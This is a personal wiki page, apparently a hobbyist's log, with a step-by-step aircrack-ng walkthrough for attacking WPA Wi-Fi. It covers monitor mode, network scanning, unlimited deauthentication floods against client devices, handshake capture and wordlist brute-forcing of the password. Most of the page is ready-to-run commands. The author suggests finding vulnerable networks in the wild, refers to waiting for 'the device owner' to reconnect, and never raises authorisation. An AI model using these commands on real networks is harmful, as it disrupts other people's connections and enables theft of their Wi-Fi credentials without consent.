aircrack‐ng - kdaisho/Blog GitHub Wiki

May 17, 2025

5GHz is killable!

Using Yagi antenna, I successfully deauthed Samsung Galaxy A54 (Phone). Maybe it's just a distance. And the capture file was also successfully brute-forced (although I know the pw). But I also took one more down with full handshake (4 of 4).

May 6, 2025

Deauth attack is ineffective against 5 GHz connections?

https://forum.aircrack-ng.org/index.php?topic=9638.0

In the thread, someone says:

Make sure your AP is set to 802.11ac (and not 11ax).

My WiFi adapter (PAU09, Panda) which supports 802.11n, not 802.11ac.

I should try ALFA AWUS036AHC soon?

Maybe not. The end of the thread they report no success even with AWUS036ACH. 5 GHz is just invincible.

May 4, 2025

Don't try 5 GHz frequency. 5 GHz is unbreakable IMO. Let's focus on 2.4 GHz for now. You don't see many but you can definitely find a few even today (as of May 2025).

Here's steps:

  1. Check the network interface names:
iwconfig
  • lo: Loopback interface -- used by the system to communicate with itself
  • wlan0 (or wlp0s20fe, or whatever): Wireless network interface (Wi-Fi)
  1. Set the wireless network interface to monitor mode:
sudo airmon-ng start wlan0
  1. List available 2.4 GHz networks. (--band bg for 2.4 GHz, --band a for 5 GHz)
sudo airodump-ng wlan0mon --band bg
  1. Narrow the channel if you see one that shows more connections than others. Make sure Data has to have value; a lot more than 0. Look for PWR, the higher number the stronger signal (note: the values are negative in most systems).

In this example, we're pinning the channel 11.

sudo airodump-ng -c 11 -w mytest -d {BSSID_OF_AP} wlan0mon

Then if you see a STATION pops up, press the spacebar to pause the terminal output, grab the BSSID of AP and of client device. Press spacebar again to undo the pause.

Now we're going to deauth the client device:

sudo aireplay-ng --deauth 0 -a {BSSID_OF_AP} -c {BSSID_OF_CLIENT (STATION)} wlan0mon

Leave it a little while;

Now verify if you captured handshakes.

aircrack-ng mytest-01.cap

If you successfully disconnected the target from the AP, the command prints something like this:

Encryption
WPA (1 handshake)

Now open the cap file with wireshark. Filter the list of packets with eapol. You should see some packets.

wireshark mytest-01.cap

Then brute-force the password:

sudo aircrack-ng mytest.cap -w /usr/share/wordlist/rockyou.txt

🤞🤞🤞

Troubleshoot

wlan0mon is on channel 2, but the AP uses channel 11

hint: https://forum.aircrack-ng.org/index.php?topic=2114.0

Steps

Check interfaces.

iwconfig

If you see Mode:Managed, switch it to Monitor mode.

sudo airmon-ng start wlan0

List available network. The previous command would change the interface from wlan0 to wlan0mon.

sudo airodump-ng wlan0mon

Choose a network BSSID from the list (e.g. BE:FB:E4:24:69:7B).

Now we want to find out the devices currently connecting to the network.

sudo airodump-ng -c 6 -w MyTest -d BE:FB:E4:24:69:7B wlan0mon
  • -c: channel
  • -w: dump filename prefix (airodump dumps several files)
  • -d: network device MAC address (BSSID)

Note: the command above dumps several files at the current directory. You may want to choose where you run the program.

Then, you will probably see only the network device. Wait for other devices appear under STATION.

But if nothing appears for the STATION, it's possible no devices are connected to the network.

If you find one, grab the MAC address. We'll start deauthentication.

sudo aireplay-ng --deauth 0 -a BE:FB:E4:24:69:7B -c 86:40:CB:D5:FA:30 wlan0mon
  • --deauth 0: Sends infinite deauthentication frames. 100: sends 100 frames.
  • -a: Specifies the MAC address of the target access point.
  • -c: Specifies the MAC address of the client (optional; if omitted, all connected clients will be targeted).

If you run without specifying the client MAC address (for -c flag), deauth applies to all clients.

The target device starts disconnecting. Wait for the device owner tries to reconnect to the network.

Let's check the dump files. If handshake occurred between target device and network device, the program should dump a cap file.

Open it with Wireshark.

wireshark MyTest-04.cap

There could be a tons of data. They don't look to make sense, you can browse, filter the list with eapol*. We'll try to extract the password from this.

  • EAPOL (Extensible Authentication Protocol over LAN) is a network protocol that allows devices to authenticate when connecting to a network. It's part of the IEEE 802.1x standard and is used for access control in wired and wireless networks.

Now you need a wordlist or some sort: A text file that contains all popular passwords. We'll brute force the cap file with it.

sudo aircrack-ng MyTest-04.cap -w myWordList.txt

(Boom)